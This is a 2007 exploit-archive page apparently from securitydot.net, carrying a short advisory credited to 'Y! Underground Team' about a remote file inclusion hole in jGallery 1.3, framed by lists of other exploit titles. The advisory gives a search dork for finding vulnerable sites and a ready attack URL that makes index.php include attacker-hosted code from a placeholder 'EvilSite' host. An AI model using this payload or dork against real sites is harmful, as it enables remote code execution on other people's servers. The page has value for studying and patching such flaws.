exploits , vulnerabilities , articles , jGallery 1.3 (index.php) Remote File Inclusion Vulnerability

2007-06-03 Particle Gallery <= 1.0.1 Remote SQL Injection Exploit
2007-04-16 StoreFront for Gallery (GALLERY_BASEDIR) RFI Vulnerabilities
2007-04-16 Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities
2007-04-15 Pixaria Gallery 1.x (class.Smarty.php) Remote File Include Vulnerability
2007-04-12 Mambo Component zOOm Media Gallery <= 2.5 Beta 2 RFI Vulnerabilities

2007-04-18

jGallery 1.3 (index.php) Remote File Inclusion Vulnerability

Rated as : High Risk

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                         
                                        +
+                                                  Y! Underground Team    
                                        +
+                                                                         
                                        +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                         
                                        +
+          Portal......:  jGallery 1.3                                    
                                        +
+          Author......:  Dj7xpl / Dj7xpl@Yahoo.com                       
                                        +
+          Type........:  Remote File Inclusion Vulnerability             
                                        +
+          Dork........:  intitle:"jGallery"                    
                                                  +
+          Download....: 
http://portal.kooijman-design.nl/jGallery/README.html                      
             +
+          Page........:  http://Dj7xpl.2600.ir                           
                                        +
+                                                                         
                                        +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                         
                                        +
+          Bug.........: 
http://[Target]/[Path]/index.php?G_JGALL[inc_path]=http://[EvilSite]/Evil.txt%00
        +
+                                                                         
                                        +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

securitydot.net - 2007-04-18

Exploits - newest 10 RSS | More

2007-06-15 56341 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33546 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41726 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28872 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19379 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16397 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19045 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16269 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33139 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16922 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit